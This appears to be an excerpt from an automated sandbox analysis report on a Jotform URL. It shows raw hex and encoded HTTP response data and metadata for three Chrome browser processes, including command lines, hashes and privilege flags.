                                                                                                                                                                                                                                            2025-01-10 12:38:00 UTC1369INData Raw: 63 61 57 6c 4b 33 59 71 73 79 68 6e 72 57 69 32 73 44 49 79 4e 62 62 37 61 75 38 76 63 37 50 71 4c 37 6e 74 65 69 32 7a 72 48 4b 78 62 58 35 74 66 50 55 31 76 62 62 42 65 38 47 77 4f 62 2b 78 4e 67 4f 39 2f 66 69 45 4f 54 78 37 50 33 2b 44 77 67 42 30 52 49 54 2b 65 7a 72 47 77 76 76 41 41 77 4e 41 2f 6b 70 32 75 51 62 46 43 6a 36 39 2b 6b 6b 4d 2f 45 6a 42 53 41 73 4b 78 48 30 4d 54 45 58 50 44 55 74 46 67 6f 77 4c 67 51 66 52 51 67 46 43 6b 63 36 51 52 6f 4a 4a 52 38 4c 4b 69 45 65 46 43 41 52 54 43 64 4e 46 42 30 59 51 42 49 70 4f 46 74 53 59 31 68 54 4d 45 56 57 4a 6c 6f 73 53 6d 6b 34 4b 46 42 7a 59 6c 39 68 53 55 42 56 5a 6a 70 71 50 46 74 4a 61 45 77 35 58 48 68 30 51 6f 4a 58 68 48 56 42 59 49 46 33 57 49 71 50 69 57 32 4b 68 6b 39 69 67 6d 35 6b
                                                                                                                                                                                                                                            Data Ascii: caWlK3YqsyhnrWi2sDIyNbb7au8vc7PqL7ntei2zrHKxbX5tfPU1vbbBe8GwOb+xNgO9/fiEOTx7P3+DwgB0RIT+ezrGwvvAAwNA/kp2uQbFCj69+kkM/EjBSAsKxH0MTEXPDUtFgowLgQfRQgFCkc6QRoJJR8LKiEeFCARTCdNFB0YQBIpOFtSY1hTMEVWJlosSmk4KFBzYl9hSUBVZjpqPFtJaEw5XHh0QoJXhHVBYIF3WIqPiW2Khk9igm5k
                                                                                                                                                                                                                                            2025-01-10 12:38:00 UTC1369INData Raw: 48 42 6d 62 6d 6c 78 4e 66 44 34 38 54 65 7a 4c 76 4b 79 4f 69 76 32 38 50 68 35 73 37 55 74 66 58 4a 39 37 61 76 2b 2f 47 36 73 2b 73 45 76 37 76 52 42 50 48 61 41 2b 54 6a 79 67 72 6e 34 2b 59 41 41 4d 34 43 38 75 30 48 45 52 49 4a 38 64 58 72 2b 78 49 43 45 39 58 6b 2b 67 4d 6d 39 52 54 33 36 51 34 68 49 42 67 61 36 79 72 76 4e 52 59 41 46 6a 4c 31 48 41 59 7a 4f 44 51 49 4d 79 49 63 51 42 4d 58 4d 7a 64 46 48 54 4d 45 52 7a 63 6d 48 31 45 6a 4b 55 6c 4c 46 41 6c 4d 55 53 34 70 4f 6c 42 49 55 30 6c 66 49 55 46 51 59 53 56 62 57 6d 52 68 58 44 78 66 4c 46 63 69 5a 7a 49 39 63 6e 4e 77 51 57 39 30 4f 55 6c 78 64 57 68 30 55 44 68 58 55 58 61 45 57 47 46 6f 69 58 4a 5a 68 49 64 4b 5a 58 6d 4c 69 32 56 4f 69 6e 65 48 65 5a 69 43 5a 59 69 62 68 34 64 62 6e
                                                                                                                                                                                                                                            Data Ascii: HBmbmlxNfD48TezLvKyOiv28Ph5s7UtfXJ97av+/G6s+sEv7vRBPHaA+Tjygrn4+YAAM4C8u0HERIJ8dXr+xICE9Xk+gMm9RT36Q4hIBga6yrvNRYAFjL1HAYzODQIMyIcQBMXMzdFHTMERzcmH1EjKUlLFAlMUS4pOlBIU0lfIUFQYSVbWmRhXDxfLFciZzI9cnNwQW90OUlxdWh0UDhXUXaEWGFoiXJZhIdKZXmLi2VOineHeZiCZYibh4dbn
                                                                                                                                                                                                                                            2025-01-10 12:38:00 UTC1369INData Raw: 6b 79 4d 53 70 33 4c 7a 57 33 65 33 61 71 4d 58 79 74 50 62 43 2b 4c 65 77 78 2f 76 32 79 64 43 33 2b 72 51 43 42 4e 6e 41 33 66 6a 79 2f 74 33 33 79 41 50 5a 2f 63 73 53 79 78 48 31 45 2b 6f 47 31 4f 66 62 43 66 7a 30 32 77 7a 30 48 2f 4d 51 48 76 44 6e 4a 75 67 6b 39 69 37 39 42 67 4d 75 38 41 34 43 4c 77 6f 73 45 6a 62 33 42 67 67 2b 4b 50 73 52 50 53 45 59 52 54 45 42 48 41 67 33 51 79 6b 57 4f 55 4d 42 47 7a 35 49 48 53 5a 41 45 55 73 57 53 53 6c 44 53 6c 70 48 46 54 4a 66 49 57 4d 76 5a 53 51 64 4e 47 68 6a 4e 6a 30 6b 5a 79 46 75 63 45 59 74 53 6d 56 56 4e 79 35 6d 57 6c 41 75 61 6e 64 64 50 47 73 38 57 55 35 79 51 58 39 56 68 55 56 36 52 59 4e 68 53 45 61 52 6a 47 70 6f 67 31 57 54 54 70 68 75 67 35 71 64 69 58 46 57 6d 33 5a 2b 65 61 61 63 6d 33
                                                                                                                                                                                                                                            Data Ascii: kyMSp3LzW3e3aqMXytPbC+Lewx/v2ydC3+rQCBNnA3fjy/t33yAPZ/csSyxH1E+oG1OfbCfz02wz0H/MQHvDnJugk9i79BgMu8A4CLwosEjb3Bgg+KPsRPSEYRTEBHAg3QykWOUMBGz5IHSZAEUsWSSlDSlpHFTJfIWMvZSQdNGhjNj0kZyFucEYtSmVVNy5mWlAuanddPGs8WU5yQX9VhUV6RYNhSEaRjGpog1WTTphug5qdiXFWm3Z+eaacm3
                                                                                                                                                                                                                                            2025-01-10 12:38:00 UTC1369INData Raw: 72 74 33 6d 38 72 76 68 78 4b 6a 45 35 75 2f 44 75 4f 69 34 7a 37 76 74 75 38 4c 41 38 76 76 6b 30 66 54 44 41 72 33 36 41 77 50 58 2f 65 48 67 33 41 54 31 35 39 51 46 2b 42 62 5a 43 64 6a 77 36 41 34 59 39 50 41 53 34 50 66 6d 46 76 6e 33 34 52 6e 6f 39 2b 45 66 45 68 44 70 49 68 58 79 39 53 55 76 39 76 6b 72 48 67 6a 2b 4d 43 45 44 41 7a 4d 57 46 41 67 31 4b 51 63 4a 4f 67 6b 68 48 54 34 4d 52 67 70 44 4e 69 45 68 52 68 51 55 4a 6b 74 55 50 53 68 4f 48 42 38 68 55 6a 59 78 4d 56 56 4b 4f 54 56 63 54 6a 6b 34 58 6c 45 76 4d 32 45 77 4c 7a 64 6d 53 6b 31 4a 61 30 30 38 53 6d 30 39 55 45 4a 79 65 33 74 53 64 6c 70 70 56 48 6c 4a 58 56 6c 2f 59 55 39 4b 67 58 5a 6b 57 49 68 35 56 47 57 4a 6b 31 64 53 6a 6e 4a 30 59 5a 4f 46 6e 33 57 57 5a 4b 70 65 6d 6f 31
                                                                                                                                                                                                                                            Data Ascii: rt3m8rvhxKjE5u/DuOi4z7vtu8LA8vvk0fTDAr36AwPX/eHg3AT159QF+BbZCdjw6A4Y9PAS4PfmFvn34Rno9+EfEhDpIhXy9SUv9vkrHgj+MCEDAzMWFAg1KQcJOgkhHT4MRgpDNiEhRhQUJktUPShOHB8hUjYxMVVKOTVcTjk4XlEvM2EwLzdmSk1Ja008Sm09UEJye3tSdlppVHlJXVl/YU9KgXZkWIh5VGWJk1dSjnJ0YZOFn3WWZKpemo1
                                                                                                                                                                                                                                            2025-01-10 12:38:00 UTC1369INData Raw: 4f 72 6f 35 2b 48 55 7a 65 76 6d 31 50 58 77 76 75 72 65 2f 4e 55 44 2b 76 67 41 36 41 6b 42 33 77 76 74 41 51 6a 77 44 77 6e 6e 45 2f 55 4a 45 50 67 4e 43 42 59 66 37 42 66 62 44 4f 73 56 44 76 7a 30 46 75 51 6a 42 79 76 39 49 79 45 67 45 67 58 37 4a 53 30 4f 41 43 6b 69 45 51 6b 71 39 2f 41 53 4d 43 6f 51 2f 45 49 42 4f 7a 6b 34 4d 6a 38 66 52 68 38 6c 53 45 45 50 55 79 39 4e 4e 6c 4e 51 53 56 41 35 54 55 68 57 52 79 31 59 56 30 74 58 56 45 35 45 49 57 45 36 53 57 4a 59 5a 79 46 42 61 43 31 52 5a 6d 56 73 56 57 31 6b 63 6e 4e 4a 64 58 4e 6e 64 33 42 71 64 6a 31 2b 56 6d 57 43 64 49 4d 39 58 59 52 65 62 58 2b 42 69 33 75 53 69 57 5a 6c 64 6f 53 54 54 57 32 57 62 6e 32 65 6c 58 4a 78 67 70 57 63 68 61 61 64 65 6e 32 4b 6d 4b 64 68 67 61 6d 53 6b 62 4b 70
                                                                                                                                                                                                                                            Data Ascii: Oro5+HUzevm1PXwvure/NUD+vgA6AkB3wvtAQjwDwnnE/UJEPgNCBYf7BfbDOsVDvz0FuQjByv9IyEgEgX7JS0OACkiEQkq9/ASMCoQ/EIBOzk4Mj8fRh8lSEEPUy9NNlNQSVA5TUhWRy1YV0tXVE5EIWE6SWJYZyFBaC1RZmVsVW1kcnNJdXNnd3Bqdj1+VmWCdIM9XYRebX+Bi3uSiWZldoSTTW2Wbn2elXJxgpWchaaden2KmKdhgamSkbKp


                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Click to jump to process

                                                                                                                                                                                                                                            Target ID:0
                                                                                                                                                                                                                                            Start time:07:35:51
                                                                                                                                                                                                                                            Start date:10/01/2025
                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                            Imagebase:0x7ff7d6f10000
                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                            MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:1
                                                                                                                                                                                                                                            Start time:07:35:52
                                                                                                                                                                                                                                            Start date:10/01/2025
                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1960,i,13832150121213406412,16672036579387046635,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                            Imagebase:0x7ff7d6f10000
                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                            MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:3
                                                                                                                                                                                                                                            Start time:07:35:53
                                                                                                                                                                                                                                            Start date:10/01/2025
                                                                                                                                                                                                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://eu.jotform.com/app/250092704521347"
                                                                                                                                                                                                                                            Imagebase:0x7ff7d6f10000
                                                                                                                                                                                                                                            File size:3'242'272 bytes
                                                                                                                                                                                                                                            MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            No disassembly